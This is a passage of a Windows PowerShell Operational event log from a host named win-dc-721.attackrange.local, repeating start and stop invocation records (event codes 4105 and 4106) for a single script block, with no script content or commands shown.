Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471884
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471883
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471882
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471881
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471880
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471879
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471878
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471877
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471876
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471875
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471874
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471873
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471872
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471871
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471870
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471869
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471868
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471867
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471866
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471865
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471864
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471863
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471862
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471861
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471860
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471859
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471858
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471857
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471856
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471855
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471854
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471853
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471852
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471851
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471850
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471849
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471848
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471847
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471846
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471845
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471844
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471843
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471842
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471841
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471840
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471839
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471838
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471837
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471836
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471835
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471834
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471833
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471832
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471831
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471830
Keywords=None
